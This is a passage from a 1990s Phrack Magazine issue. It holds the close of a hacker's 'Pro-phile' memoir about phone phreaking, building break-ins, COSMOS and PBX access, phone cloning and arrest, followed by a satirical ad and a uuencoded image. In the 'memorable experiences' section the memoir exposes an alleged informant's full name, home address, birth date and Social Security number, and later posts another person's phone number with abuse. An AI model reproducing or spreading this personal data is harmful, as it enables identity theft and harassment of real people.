  4646.      central offices, and gained COSMOS access.  We barely knew what
  4647.      COSMOS was .. I knew I had read about it in old Phrack articles, and
  4648.      I remembered that it was "elite."  Our problem was, we still knew no
  4649.      other "real" hackers, and we had to learn COSMOS.  After trashing
  4650.      and trashing, we still had no COSMOS manuals.  We had to get them
  4651.      somehow.  I can't say how, I'll leave it to your imagination.
  4652.  
  4653.           Marko and I started breaking in buildings and got pretty
  4654.      good at it.  We had about a 60% success rate I would guess.  But we
  4655.      never stole anything -- we just looked for cool information.  In
  4656.      1991, we got caught in a building, and got charged with Criminal
  4657.      Trespassing.  We both got probation for a Class A misdemeanor.
  4658.      We decided it was time to stop breaking in buildings.
  4659.  
  4660.           Late in 1991, I got e-mail on a bulletin board from someone
  4661.      named Mucho Maas.  He said he had gotten ToneLoc and wanted a
  4662.      few new features.   I told him I had lost the current source and
  4663.      all I had was an old (0.85) source.  He said he would take the
  4664.      old source, add the new features, and bring it up-to-date with
  4665.      the current source.  So he did, and we released ToneLoc 0.95.
  4666.      If it weren't for Mucho, ToneLoc would still be at version 0.90,
  4667.      and anyone who ran 0.90 knows how hard it was to get it running
  4668.      right.
  4669.  
  4670.           About the same time, I was getting on a few BBSs in the
  4671.      Washington DC area.  (Pentavia was the best while it was up).
  4672.      I met several people there... including a guy named Codec.  Codec
  4673.      was mostly a phone phreak, but did a little hacking as well.  But
  4674.      when it came to PBX's, he was a master.  Not only had he exploited
  4675.      PBXs for free long distance use like the rest of us, but he had
  4676.      actually REMOVED entire PBX systems from buildings!  (See his
  4677.      article on how to do this, Phrack 43, article 15).  But he had
  4678.      also gotten caught and was on federal probation.
  4679.  
  4680.      A few months after I met Codec, he had an 'incident'
  4681.      and was on the run again.  I agreed to let him live with me, so
  4682.      he flew down and moved in.  We got a 2 bedroom place, and set
  4683.      the place up d0pe.  There were over 9 phone extensions, (not
  4684.      including cordless), and about the same number of computers (Most
  4685.      of which were Codec's).  We had the funnest 3 months ever ...
  4686.      but about 2 weeks after SummerCon 1992, we got arrested.
  4687.  
  4688.  
  4689. Favorite things
  4690. ~~~~~~~~~~~~~~~
  4691.  
  4692.               Women: w0w
  4693.               Music: Sonic Youth, Cure, Fugazi, Minor Threat, Orb, B-Boys,
  4694.                      Jane's Addiction.
  4695.       Favorite Book: 1984
  4696.              My Car: 1990 300ZX Twin Turbo, Wolf Chip mod to 360
  4697.                      horsepower.  It's fucking fast.
  4698.     Favorite Movies: Jackie Chan movies, The Killer, Reservoir Dogs,
  4699.                      The Lost Boys, Near Dark, Hardware.
  4700.         Favorite TV: MacGyver
  4701.  
  4702.  
  4703. What are some of your most memorable experiences?
  4704.  
  4705.      Being polygraphed by the Secret Service in 1991 for something having
  4706.      to do with some lamer threatening the president on an Alliance
  4707.      Teleconference.  I failed the polygraph the first time, then I
  4708.      passed it the second time.  (How's that for the government?)
  4709.      Eventually, some other 15-year old got probation for doing it.
  4710.  
  4711.      Being arrested with Codec in 1992.  He ran, outran the cops, jumped
  4712.      a fence about 8 feet tall, and eventually got in a struggle with
  4713.      a cop over the his gun (Officer Sheldon Salsbury, Austin PD).  The
  4714.      gun went off, and we were both booked on attempted capital murder.
  4715.      It turned out that the bullet hit no one, and all the blood was from
  4716.      the cop hitting himself in the head with his own gun, although the
  4717.      cop claims that Codec hit him in the forehead with a 2-meter ham
  4718.      radio from like 20 feet away.  Right.  A search warrant was executed
  4719.      on our apartment, and approximately $800,000 worth of AT&T Switching
  4720.      equipment was seized from Codec's closet.  It turns out, we were
  4721.      narced on and set-up by :
  4722.  
  4723.        Jon R. Massengale
  4724.        6501 Deer Hollow
  4725.        Austin, TX  78750
  4726.        DOB: 9-7-62
  4727.        SSN: 463-92-0306
  4728.  
  4729.  
  4730.      Being the first in Texas to have Caller-ID, before it was legally
  4731.      available.
  4732.  
  4733.      Losing control of my car at 140mph, doing a slow 360 at about 120,
  4734.      living through it, and not doing too much damage to my car.
  4735.  
  4736.  
  4737.    Good times:
  4738.  
  4739.      Going up to Seattle to visit Cerebrum in May 1993, seeing Fugazi,
  4740.      getting our car towed, then reading the dialups to the towing
  4741.      company's xenix (login: sysadm).  Finally getting our Oki 900's
  4742.      to clone/tumble/do other d0pe things.  Calling each other on
  4743.      our Okis from 5 feet away, putting them together and causing
  4744.      feedback.
  4745.  
  4746.      Setting up my apartment with Codec with a 10-station Merlin system,
  4747.      and a 9-station network.
  4748.  
  4749.      SummerCon 1993.  "Culmination of Coolness."  Sorry, can't say any
  4750.      more.
  4751.  
  4752.  
  4753. Some People To Mention:
  4754.  
  4755.  
  4756.      There are a lot of people who I would like to mention that have helped
  4757.      me greatly and who I have known for a very long time:
  4758.  
  4759.      Marko Ramius   -  First pirate/hacker I really knew in person.  We
  4760.                        did a lot of crazy shit together.
  4761.  
  4762.      Alexis Machine -  Second hacker-type I met, and a true Warez Kid.
  4763.                        (that's a complement!)
  4764.  
  4765.      Mucho Maas     -  Brought back ToneLoc from the dead.  Always told
  4766.                        me what I shouldn't do, and always said "I told
  4767.                        you so" when I got busted.
  4768.  
  4769.      Codec          -  I had some of the funnest times of my life with
  4770.                        Codec... unfortunately, it was so much fun it was
  4771.                        illegal, and we got busted.
  4772.  
  4773.      Cerebrum       -  Very cool friend who got narced on by a fuckhead
  4774.                        named Zach, 206-364-0660.  Cerebrum is serving
  4775.                        a 10 month federal sentence in a nice prison camp
  4776.                        in Sheridan, Oregon.  He gets out about December
  4777.                        10, 1994.
  4778.  
  4779.      The Conflict   -  Unfortunately, I can't tell you.  Maybe in about 8
  4780.                        more years.
  4781.  
  4782. ESAC Administrator  -  "Have you been drinking on the job?"
  4783.  
  4784.  
  4785. What I'm up to now
  4786. ~~~~~~~~~~~~~~~~~~
  4787.  
  4788.      When I heard that the next Phrack Pro-phile was going to be about
  4789. me, I realized, "I must be retired".  It's probably true.. at least I hope
  4790. it is.  The 5 months I spent in jail was enough.  I just started going
  4791. back to University of Texas, where they will only give me a VAX account
  4792. (lame).  For the first time in 4 years, I think my life is going in
  4793. the 'right' direction.
  4794.  
  4795. Advice
  4796. ~~~~~~
  4797.  
  4798.      I can only hope anyone who reads this will take this seriously.
  4799. Here's my advice:  If you ever get arrested or even simply questioned about
  4800. ANYTHING AT ALL, DO NOT COOPERATE.  Always tell the law enforcement
  4801. official or whoever, "I'm sorry, I can't talk without my lawyer present"
  4802. Cooperating will never help you.  Codec recently pointed out to me, that
  4803. we should be the "role models" of what people should do when they get
  4804. busted.  Both of us remained loyal and quiet during our whole case.  I was
  4805. in jail for 5 months, and Codec is still in prison, but we never talked.
  4806. Being narced on by a 'buddy' is the worst thing that could ever happen
  4807. to you, and narcing on a 'buddy' is the worst thing you could do to
  4808. them.  If you get busted for something, don't pass the punishment on
  4809. to someone else.  I hope most of you never have to face this, but if
  4810. you do, you will live much better knowing that you didn't give in to
  4811. a bunch of 'law enforcement' pricks.
  4812.                               ==Phrack Magazine==
  4813.  
  4814.                  Volume Five, Issue Forty-Six, File 6 of 28
  4815.  
  4816. ****************************************************************************
  4817.  
  4818.                                   BIG FUN
  4819.  
  4820.  
  4821. Think Federal District Court Judges and Special
  4822. Agents get to have all the fun?
  4823.  
  4824. Not any more!!
  4825.  
  4826. It's the Operation Sun Devil Home Game!
  4827.  
  4828. For the first step in the game, a quick flourish of a pen
  4829. signs away your opponent's rights to any expectations of
  4830. privacy.  Bank records, medical records, employment
  4831. files, student records...literally anything is yours
  4832. for the taking.
  4833.  
  4834. As you progress through the various levels, you move on
  4835. to other legal scenarios like the application for search
  4836. warrant and the summons.
  4837.  
  4838. It's all here in the Operation Sun Devil Home game, by
  4839. Gailco.
  4840.  
  4841. ===============================================================
  4842.  
  4843. Other game pieces available via ftp from freeside.com
  4844. in /pub/phrack/gailco.
  4845.  
  4846. Offer not sold in stores.  Do not use.
  4847. Impersonating an officer of the court is a felony.
  4848.  
  4849. section 1 of uuencode 4.13 of file GAME.PCX    by R.E.M.
  4850.  
  4851. begin 644 GAME.PCX
  4852. M"@,!`0````!/!D@(Q@#&````````````````````````````````````````V
  4853. M```````````````````````````!R@`!`"`#6`(`````````````````````W
  4854. M``````````````````````````````````````````````````#________-(
  4855. M_________\W_________S?_________-_________\W_________S?______D
  4856. M___-_________\W_________S?_________-_________\W_________S?__R
  4857. M_______-_________\W_________S?_________-_________\W_________>
  4858. MS?_________-_________\W_________S?_________-_________\W_____R
  4859. M____S?_________-_________\W_________S?_________-_________\W_R
  4860. M________S?_________-_________\W_________S?_________-________]
  4861. M_\W_________S?_________-_________\W_________S?_________-____R
  4862. M_____\W_________S?_________-_________\W_________S?_________-R
  4863. M_________\W_________S?_________-_________\W_________S?______D
  4864. M___-_________\W_________S?_________-_________\W_________S?__R
  4865. M_______-_]'_P?!'P?[!X<'@P?_!]F#$_\'XPO_!\'______ZO_1_\'P8\'^X
  4866. M8<'@P?_!]&#$_\'XPO_!\'_!_O_____I_]#_'\'@P>'!_@$`?\'&`'_#_\'PF
  4867. MP?@^(!X.?\'_P?C_____YO_0_P_"P\'^`PX_CAX?P__!P,'\'P/"#A_!_\'^^
  4868. M'______E_]#_!X?!Y\'^`PX_#L(>#V_!_\'`?!X'C@\?P?^$#\'_A\[_C___X
  4869. M___4_]#_!X?!Y\'_`PX_#PX>#V?!_\'&P?X?!X</'\'_!P_!_X?._P?#_Y_!E
  4870. M_Y______SO_/_\'^`8?!\<'^`X`_#@`AA&?!_\'\?QP#!X^?P?\/CC^`/P_!M
  4871. MY<'_G[_'_\'^`#'!_\'G'\'\!______._\__P?PAP>?!\<'^`<'`P?\,`&"`L
  4872. M8<'_P?C!_SP@!X^?P?^#P>QXP<!X(\'@P?P_P>'!^,'_P?G$_\'\`#'!_\'A&
  4873. MG\'X`?_____._\__P?P`P>/!\<'\<`!_'#!@`&/!_\'PP?YX<`?!Q\'?P?_!H
  4874. MP,'X<,'`&`'!P'#"`,'P/\'QP>!_P?A_P?!X<<'^P?*?PO#!\<']_____\S_<
  4875. MS__!_&#!X\'PP?QP.'Y\<&`@9\'_P?C!_'AP)\'WPO_!X'APP>`X8,'@<&`@,
  4876. MP?`_P?#!X'_!^'_!^'QPP?S!\+_#\,'XP?S_____R__/_\'X8&'!X<'\<`P_<
  4877. M'GYAP>8'P?_!^,'^.,'[AX^?P?_!\``XP<.`<!H`P<`PP>$/P?&`'\'P0\'PV
  4878. MP?_!\`AA'\'AP?G!P,'@.`______RO_/_\'\'$.#P?X0#A\>/@.&#\'_P?C!S
  4879. M_QS!_P^/G\'_P=X$/,''@'@?``(<7P_!\8<?P?N'P?C!_\'P#F,?P>/!_X``M
  4880. M#`______RO_0_\'^#@_!_@`$/P\^``\.?\'\P?\<P>8?CQ_!_P\$/`>,>!\`7
  4881. M!AP$#\'A#Q_!_@?!_,'_P>,,0Q_!Q\'_C`,,#______*_]'_/@_!_P<&/P\_9
  4882. M!L(//\+_'\'F'X\/P?\/AAZ'ACH/`@X>`@_!XX</P?X'P?[!_X..0P_!Q\'_[
  4883. MC@,&!______*_]+_'\'_!\'`P?\//\'^'[_$_\'\/Y\?P?\'!`"'#"`.`8P\P
  4884. M`P_!X8<?P>`'P?P_`8#!XQ_!X\'_@``0`______*_]7_P?'!_\'OR/_!_<'_]
  4885. MP?X_P?^`P@#!P`@A@"#!X#A`#\'AAQ_!X,'#P?A\`<'@P>$?P>'!^,'`<``#'
  4886. M_____\K_U__!Y\K_P?Y_P?_!X'Q`P>!X`<'@<``PP>`'P?#!QI_!X,'#P?C"4
  4887. M,,'AP>"?PO``<`#!\______*_^7_P?C!_\'YPOASP?#!^'S!^,'PP?_!\<+_@
  4888. MP?!AP?Q@<,'QP>`_P?!@P@`PP>/_____RO_I_\'X?\'[P?Y_P?[!\,'_P?G"^
  4889. M_\'X`\'\`''"X1_!^,0`0______*_^G_P?[-_\'?P_^?P?X'@A`>#______*;
  4890. M__W_#\'/'A\/_____\K_S__!]\,'S`^/P=^/P=_#G______F_\__P?3$`,8$2
  4891. MP@##!`>'#Q_"G\*______^7_S__!_<'XPN!@PR``PB``PB#,`"``PB#$8,'@R
  4892. MPF#!X&#"^<']P?G!_?_____1_]#_P?G%\,)@P>#!\&!PP?#"X&!`Q6``0,0`1
  4893. MQ4#"8$#"8'#&\,'QP?G!_?_____,_]__P?W!_\/YP?W!^<'XP?#"^,;PQG##:
  4894. M8,(@Q6#$<,3PP?'!^\'PP?C!_\'Y___]_^?_P?O"_\/[P?#!^<+P<&#!\'!@'
  4895. MPT#+`,-`8&'!^\+PPOO___W_S__!^L0``@#'`L(&#L(/'Y_"'Y\?P?^?P=_/@
  4896. M_\+?GY["#@;%`LH`Q@(/PA^?P=____#_S__!_L4$P@`$P@#"!,4&P@\.Q@_"K
  4897. M'\?_O\G_O\8/P@["!@0&!,@`PP0&#L</'\'_/___Z?_0_\*/#\4'P@\'PP\'F
  4898. MR`8"!@+%!L('PP;"!\4/CY^/PY_!W\;_G\6/Q`_$!\P&PP?)#\*/GP_#C\.?I
  4899. M___3_]3_C\(/!X^?#[^?CP?"!,(`PP33``0.!P^/PY_"O\S_O\'_P=^_C\(?X
  4900. MPP31`,($`,@$!L(/'\*?___0_^;_P?W!^<'QP_G"\,'QP?#!X,)@(&`@S0#"'
  4901. M(,'@8'#!X,']PO'"^<+]RO_!_<'_P?W$^<'QP^!@QR``PB#+`"``PB!@Q.#!8
  4902. M\,'@8,'@P?#!\<'@P>'!_<'_P?W[_^C_P?O!_\'YPOO!^,']P?G&\,/@Q&#"I
  4903. M0,8`PD##8,'@QO#!\\/YR__#^\+QR?!PP?#"X,)@P>#$8$##`$``PF##0&#";
  4904. M0`#$8'#(\,'Q]/_Z_\']P?G!_<+YP?C#\'#!\,-PQ&#%(,5@PW#!\,)PP?#$F
  4905. M^,+YP?_!_<'YP?W)_\']P?_!_<'_P?W!_\'YP?_!^<'XQ/!PP?#$<,-@<,)@-
  4906. M<,A@PR#$8,)P8,1PP?!PQ/#!^,'YP?C!_=_____!_\'YP?_!\,'YP>##\,'`B
  4907. M0-(`0&#$\,'YP_O7_\'ZP?'!^,'YP?C!^<'P0&!`<$!@PT#7`$#"`$#"<,'XO
  4908. M>,'[P?_!^\'YP?O9____SO_!W\*?'Q[##L(&P@+.``(&P@#$`L<&#AX/PI_!9
  4909. MW];_G\'?'X\>!@<.PP8"#L,"T`##`L,&P@X/'\[____1_Y^_PI\?Q`_##@8.Q
  4910. MQ`;"!,0`!,8`!``&P@0`PP0&Q@\?#\2?OY^_G[^?R?^_P?^_#\(?GQ\/PA^/N
  4911. MPP\.#P8/Q0;.`,(&#A_,____W__!W\'_G\'/PX_"#\8'!L0'!L('Q08"R`;#-
  4912. M!P;&!\(/!\(/Q(^?C\'?P<_!_\'?RO^?P?^/P=_"G\*/#X_%#\('P@;"`@8":
  4913. M#\S____I_Y^_/[^/P@\_Q`\'CP;"!-@`P@0`P@</#@^/P[_!_Y_7_\*?AX0`1
  4914. M!``?S/____O_P_W!^<'QPN#!\,'@PV`@8,(@8"``(,\`(``@`,(@8,'@8,'@$
  4915. M8,'@8,+PP?'!^<+QP?G!_=C______\'_P?G!_\/YP?C+\,'@PV!`8-``0`!`,
  4916. M(&#"0,'PPF#!X,/PP?'!^<'QPOG1_______2_\3]P?G%^,GPQ'#"8"#"8,D@Y
  4917. MQ&#$<'_,_______?_\+[P?_!^\'_P?G!^'#"\,'`0`#"0-$`'\S______^[_"
  4918. MP]_!_\'?P?^?PA_##L(&PP(?S/______^/^_P?^?O\,/'\S_________S?__&
  4919. M_______-_________\W_________S?_________-_________\W_________>
  4920. MS?_________-_________\W_________S?_________-_________\W_____R
  4921. M____S?_V_\'`?\'\?\'S_____]'_]O\`'\'^'\'S_____]'_]?_!_@`.!!_!L
  4922. MP#]_T__!S___^O_U_\'^``8"'X`??\3_P<?._\''O___^?_U_\'PPP`?@`#%P
  4923. M_\'`SO^`'___^?_U_\'PPP`_@`#%_\'@SO_!P"/___G_]?_!X,,`/@`!Q?_!$
  4924. MX<7_P?C'_\'\P@#!\=/_P?S#_\']___@__7_P>!@(``\(`'%_\'AP?_!\\/_0
  4925. MP?Q_QO_!^,(`<=/_P?A]P?_!_,'XQ/_!^<K_P?W__]#_]?_!X,'XP>``.$`#'
  4926. MQ?_!P\'_P>/#_\'X#\;_P?#"``/3_\'X.,'X0``#P__!P<K_P?S__]#_]?_!1
  4927. MP\'_P<`#'@`'Q?_!Q\'_P<?#_\'\#\;_P?#"``?#_\'/Q?_!W\G_P?X"PP`#3
  4928. MP_^#RO_!_A___\__]?^'P?^'`Q_!Z`?%_\'/P?^'P__!_@?&_\'`#@`/P_^/T
  4929. MQ?^/R?_!_L4`/\+_A\K_P?P?RO_!_!___\/_]?^'P?\'`Q_!Z`?%_\'/P?^'V
  4930. MP__!_@?&_\''#P`/P_^/Q?^/R?_!_L4`'\+_A\7_G\3_P?X?RO_!X@^?___"7
  4931. M__7_C\'^#@,_P?@'Q_\'P__!_``_Q?^'P?_!P!_#_P_%_P_)_\'^Q0`/PO^/Y
  4932. MQ?^?Q/_!^#_*_X`$'___PO_U_\'OP?P,`3_!^`/'_P/#_\'\`'_%_\'#P?_!*
  4933. M\#_#_P_$_\'^#\K_Q0`'PO^/Q?^_Q/_!\'_#_\']QO_!X``G___"__;_P?`X^
  4934. M`'_!\`/&_\'\`\/_P?P`/\7_`\'_P?A_PO_!_`_$_\'X'\;_P?'#_\'`Q``'\
  4935. MQ__!_'_$_\'PQ/_!\,7_P?Z```/__\+_]O_!\'@`?\'X`<+_P?W#_\'X`\3_%
  4936. MP>`KQ/_!_@/!_\'X?\+_P?POQ/_!^#_&_\'QP__!X,0``\?_P?A_Q/_!\,3_4
  4937. MP?#$_\'^?,(`(\O_P?GU__;_P>!X`S_!^`/!_@?!^,+_'\'X`'_!_\'OP?_!B
  4938. MP`/$_\'^!\'_P?Q_PO_!^`_$_\'X'\;_P>'#_\'PQ``!QO\/P?@_Q/_!\\3_;
  4939. MP>#$_\'X&,(`#\O_P?'U__;_P<!\`Q_!^`?!_@?!^#_!_P_!^``/P?^/P?_!X
  4940. MP`/$_\'^!\'_P?X_PO_!^`_$_\'X'\;_P</#_\'^P@`/``/&_P_!^!_$_\'W_
  4941. MQ/_!P\3_P?X8P@`/R__!\?7_]O^`?`,?P>@'P?X'P<`?P?X/P>``#\'_!\'_L
  4942. MP=P`/\/_P?X'P?_!_!_"_\'H#S_!_Q_!_\'@#\+_O\/_P>?$_YX-C\'``<;_R
  4943. M#\'H'\G_@\3_P>@`!@`?R__!P_7_]O^"P?X##\'@!\'^!\'`#\'^!\'@``?!3
  4944. M_P?!_\'<`A_#_\'^`Q^,#\+_P>`''\'_#\'_P<`//\'_/\+_/\'GQ?\/C\'N@
  4945. M`\;_#\'@'\G_@\3_P<.`!P(_R__!P_7_]O\!P?@#!P`'P?@#P@#!\`/!X``'_
  4946. MP>``P?_!_``!P__!_,0`/\'_P<``'X`!P?^``#_!_!_!_\'\#\'CQ/_!_#F/R
  4947. MP?P`QO^/@!_!_[_'_P/$_X&`1\'\S/^!]?_V_P#!^`'"``'!\,(``<'P`<'PF
  4948. M`"?!X`#!_\'@``'#_\'PQ``_P?_!X``_P@#![\'``#_!^#_!_\'P`<'AQ/_!^
  4949. M\''!S\'\`,'_P?Q_P?_!X<'_P<_!X#')_P'$_X&`P>?!^,S_P<'U__7_P?X!3
  4950. MP?#"`&`!P?``(`'!\`/!^`'!_\'``'_!P,'@`</_P>#$``'!_\'@`#S"``_!9
  4951. MP`!_P?`'P?_!\`!CQ/_!\,'QP<?!_@#!_\'X?\'_P>#!^,'?P<``?!_!\<'_K
  4952. MP>/!_\'^P?_!_@##_\'^@`#!X\/_P?W)_\'!]?_U_\'\`<'X`##!\`'!^`!PM
  4953. M`\'X`\'X`\'_P>`@?"#!\`'#_\'@Q0#!_\'P('P@`#_!X!!_P>`CP?_!X``C@
  4954. MQ/_"\,'OP?X`?\'P/\'\8'!_H`!X!\'@P?S!X<'_P?@WP?P`P?/"_\'^P@#!`
  4955. MY\/_P?C"_\'QP?_!]\+_P?O!_`'U__7_P?P!P?@"/\'P`\'^`,'X`\'X`\'X_
  4956. M!\'_@$`/`,'P`</_P<#%`'_!\!_!_Q@`'\'@&\'^``'!_L(`#\3_P<#!\<'/&
  4957. MP?\`?\'@#\'XP@`_P@`X`\'`?`#!_\'P`<'X``/"_\'^!@#!Y\/_P?!_P?_!L
  4958. MX<'_P</!_\'/P?'!_`!_]/_U_\'\`\'X`A_!\`?!_@/!_`?!_`?!^`?!_X#!9
  4959. MP`\`P?X#P_\#@,0`'\'X'\'_'X`?P>`?P?["`,'\`@`?Q/^`<X_!_P`_P<`/K
  4960. MP?#"`#\`!@`"`#P`P?^``<'X``/"_\'\#@`'P_^`#\'_@'X#P?X/P<#!_@`#F
  4961. M]/_U_\'\`\'\`Q_!^`?!_@/!_`?!_`_!_`_!_P`@#P'!_@/#_P.`Q``?P?@/>
  4962. MP?\/@!_!X!_!_@(`?`8`'\3_@'N/P?\`/\'`#\'@P@`_``\``@`<`,'_@`!\$
  4963. M``?"_\'\#@`'P_\`#\'_`#X!P?X'@'P`!_3_]?_!_@/!_`,'``?!_P/!_@?!G
  4964. M_@_!_@?!_X#!_@\#P?\#P_\#P?\.#X\`#\'@#\'_C\'`'\'@'\'^!P`^!\'.'
  4965. M'\3_`'>/P=\`'\'@#\'`!@/!_X`?P>["`AX#P?\``GX##\+_P?X.`0?"_\'^L
  4966. M`@<?`!X"?@<`/@`']/_U_\'\`\'\`L(`!\'^`\'\!\'\#\'\!\'_@,'\'P#!(
  4967. M_@'#_P'!_[X?P?\`#\'P#\'_C\'@'\'@'\'^`P`\!\'\/\3_`'./P?\`/\'PI
  4968. M#\'`'@'!_X`?P?["`#P!P?["`'X#O\+_P?P>`(?"_\'PP@`>`!X`<`,`/``#G
  4969. M]/_U_\'X`<'PPP`#P?X!P?@#P?@'P?@'P?^`P?#!_P#!_`'#_X!YP?@@P?'!)
  4970. MX`?!\!_!_\''P>`_P>`_P?P#P<!\!\'XQ?\`P?'!P<'P`'_!\#_!X#_!\<'_$
  4971. MP<!_P?P!P>#!_`'!_@'!X<'\`\/_P?`<`,'GPO_!\,(`.`!\`'#"`#P`P>/T<
  4972. M__7_P?@!P?``,,'@`\'\`<'X`\'X`\'X!\'_P<#!\,'_`,'\`</_@"#!\`!A`
  4973. MP?`'P?`?P?_!P\'@/\'@?\'\`\'@P?@#P?#%_P#!\<'`P?``?\'P/\'@?\'Q:
  4974. MP?_!P'_!_`'!\,'\`<'^`<'AP?X!P__!\!P`P>/"_\'PP@!X`'P`P?``0'P!)
  4975. M]?_U_\'X`<'P`'_!\`/!_@'!^`/!^`?!^`?!_\'`P?'!_@#!_`'#_\'`Q`!X2
  4976. M!\'P/\'_PN`_P?!_P?P#P>'!^`/!\,3_P?P`P?#!X&``?\'P/\'@?\'AP?_!7
  4977. MX'_!_`'!^<'\`<'\`<'[P?P!P__!\#P`P>?"_\'P.&!^P>#!_@#!^`#!X'P!9
  4978. M]?_U_\'\`<'X`C_!\`/!_@'!_`/!^`_!^`?!_X#!P\'_`,'\`</_P<#$`'@'1
  4979. MP?`?P?_!P,'@/\'@/\'\`\'#P?P#P?'$_\'^`'&``(`_P?`?P>`_P</!_\'`O
  4980. M?\'\`\'_P?P!P?X!P?_!_@'#_\'P'@#!Q\+_P?`/P<!_@,'^`<'^`<'@P?X#]
  4981. M]?_U_\'\`,'\#C_!\`?!_@/!_`?!_`_!^`?!_X`/P?\!P?X#P__!P,0`'@?!H
  4982. M^!_!_PP`'\'@'\'^!P_!_`?!P'_#_X``<X_!WX`?P?@/P<`?#\'_@#_!_@?!"
  4983. M_\'^`\'^`\'_P?X#P__!X!X`P<?"_\'`'\'`'X#!_@'!_@/!\\'^`_7_]?_!M
  4984. M_`'!_`\_P?@'P?X#P?P/P?P/P?P/P?^`#\'_`<'_`\/_P<#$`!X'P?@?P?\.C
  4985. M`!_!X!_!_@</P?P'@!_#_\(`>X_!_X`?P?@/P<`?#\'_@!_!_@?!_\'^`\'^K
  4986. M`\'_P?X#P__!P!X!A\+_P<`/P<`?@'\!P?\'PO\']?_U_\'^`,'TPA_!X`?!J
  4987. M_P/!_@?!_`_!_@_!_X`_P?\#P?\'P__!_L0`#@?!^`_!_P\`'\'`'\'^`Q_!+
  4988. M_@,`#\+_P?["`'>/P?^`'\'@#\'`#P._@!_!_@?!_\'^`\'_!\+_!\/_P<`>/
  4989. M`X?"_\'`#\'`'X!_`\'_!\+_!_7_]?_!_`#!\,(_P?`'P?X#P?P'P?P/P?P'G
  4990. MP?^`?\'_`,'_`\/_P?S$``X'P?@/P?X?@!_!X!_!_@`_P?S"``_"_\'^P@#!$
  4991. M\X_!_X`?P?`/P<`.`#^`/\'^!\'_P?P#P?X#P?_!_@/#_\'@'@'!Q\+_P?`/(
  4992. MP<`_@'X!P?\#P?_!_@/U__7_P?P`<,'^/\'P!\'^`<'X!\'X!\'X!\'_@,+_[
  4993. M`<'^`</_P?W!X``@P>`<!\'P'\'\/\'@/\'@/\'\`,'_P?S"``?"_\'XP@#!%
  4994. M\<'/P>'!P#_!\`_!X,(`/\'`?\'\`\'_P?P!P?X!P?_!_@/#_\'@'`'!Y\+_I
  4995. MP?`_P>!_@,'^`<'\`<'_P?P!]?_U_\'\`&#!_C_!\`?!_@'!^`/!^`/!^`?!%
  4996. M_\'`PO\`P?X!Q/_!\`#!\<'@'`?!\!_!^#_!X#_!X'_!^`'!_\'\`&`'PO_!S
  4997. M^$``P?'!P&#!P'_!\!_!X,(`?\'`?\'\`\'_P?P!P?X!P?_!_@/#_\'P'`'!>
  4998. MY\+_P?`_P>!_@,'^`<'\`<'_P?P!]?_U_\'\`"'!_'_!\`?!_@'!^`/!^`?!:
  4999. M^`?!_\'@P?_!_@#!_`'#_\+PPO_!\#@_P?`_P?A_P?`_P>!_P?@#PO_!X,'P3
  5000. M!\+_P?C!\`#!\<'`<`!_P?`_P?``0#_!X'_!_`/!_\'\`<'^`<'_P?X!P__!K
  5001. M\#P!P>?"_\'P/\'P?X#!_@'!_`'!_\'\`?7_]?_!_``#P?X_P?`'P?X!P?@##
  5002. MP?P'P?@'P?_!P,+_`,'^`</_P?!`/\'_P?`<'\'P'\'P/\'@/\'@/\'\`\+_$
  5003. MP<#!^`?"_\'[P?``P?'!P,'P`#_!\!_!\`'!P#_!P'_!_@/!_\'\`<'^`<'_C
  5004. MP?X#P__!\!X!P>?"_\'P'\'@?X#!_@'!_@/!_\'\`?7_]O\`!\'^/X`'P?X#@
  5005. MP?P/P?P/P?P'P?^`PO\`P?X#P_^```_!_\'`'A_!^!_!\!_!P!_!X!_!_@?"1
  5006. M_\'#P?P'P__!_`/!\X_!_P`?P?`?P?X'P<`?@'_!_@?!_\'^`\'^`\'_P?X'I
  5007. MP__!\`X'A\+_P?`?P<`?@,'^`<'^`\'_P?X#]?_V_P`'P?\?``?!_@/!_`_!'
  5008. M_`_!_`_!_X#"_P'!_P/#_X``![_!P!X?P?@?P?`?P<`?P>`?P?X'PO_!X\'^G
  5009. M!\/_P?P#P>>/P?\`'\'X'\'_#\'`'X!_P?X'P?_!_@?!_@/!_\'^!\/_P>`.5
  5010. M#X_"_\'@#\'`'P'!_P'!_P?!_\'^!_7_]O^``@\.``?!_@/!_@?!_@_!_@?!_
  5011. M_X#"_P`_!\/_P@`"#P/!_A_!X!_!X!_!P!_!P!_!_@?"_\''P?X/P__!_@?!+
  5012. MQX_!_X`?P>`?P?\/P<`?@#_!_@?!_\'^!\'_!\'_P?X'P__!\`8?C\+_P>`//
  5013. MP<`?`<'_`\'_!\'_P?X']?_V_X``#L(`!\'^`\'\!\'\#\'X!\'_@#^_`#X#_
  5014. MP__#``<!P?@_P?`?P?`?P<`_P>`?P?X'PO_!Y\'^!\/_P?P#P<>/P?^`'\'@T
  5015. M'\'_#\'@'X`_P?X'P?_!_@/!_@/!_\'^`\/_P?`&'X?"_\'P#\'@/X#!_@'!Q
  5016. M_@/!_\'^!_7_]O_!X,,`>`!\`<'X`,'X`<'P`<'_@,(\``P!PO_!_,0``\'@U
  5017. MP?_!X!_!\`_!P#_!X#_!^`/"_\'GP?P'P__!_`'!P8O!_\'`/\'P/\'_/\'@E
  5018. M/X!_P?P#P?_!_`'!_@'!_\'\`\/_P?``?\'GPO_!\#_!X'^`P?X!P?X#P?_!B
  5019. M_`/U__;_P>##`,'X`'@`P?@`P?@`P?``P?^`('S"``'"_\'\Q``#P>#!_\'@.
  5020. M'\'P#\'`/\'@?\'X`\+_P</!_`?#_\'X`<'``<'_P<`_P?`_P?P_P>`_P<!_^
  5021. MP?@#P?_!_`'!_@'!_\'\`\/_P?``P?_!Y\+_P?`_P>!_@,'^`<'^`<'_P?P!D
  5022. M]?_V_\'PP@`!P?@`P?@`P?P`P?@`P?``?L(`?,(`(<+_P?PXP?##`,'AP?_!R
  5023. MX`#!\`!@?\'@/,'X`,'XP?]`>`?#_\'X.,(`<,'`?\'P/\'X?\'P?\'@?\'XA
  5024. M`\'_P?P!P?P!P?_!_`/#_\'X`,'_P>?!_\'XP?`_P>!_@,'^`<'\`<'_P?P!D
  5025. M]?_V_\'XP@`!P?@`P?P`P?P`P?@`P?@`/L(`P?["``/"_\'\/\'PPP#!P\'_=
  5026. MP>``<,(`/\'`"G@`P?C!_P!X!\/_P?@8PP"`'\'P'\'X.\'P/X!_P?@#P?_!M
  5027. M_`'!_@'!_\'\`\/_P?@`?\''P?_!\<'P/\'@?X#!_@'!_@/!_\'\`_7_]__"?
  5028. M`!_!_@?!_P/!_@?!_@?!_@!_@`/!_\'``!_"_\'^/\'_@,(`'\'_P<``,`!`W
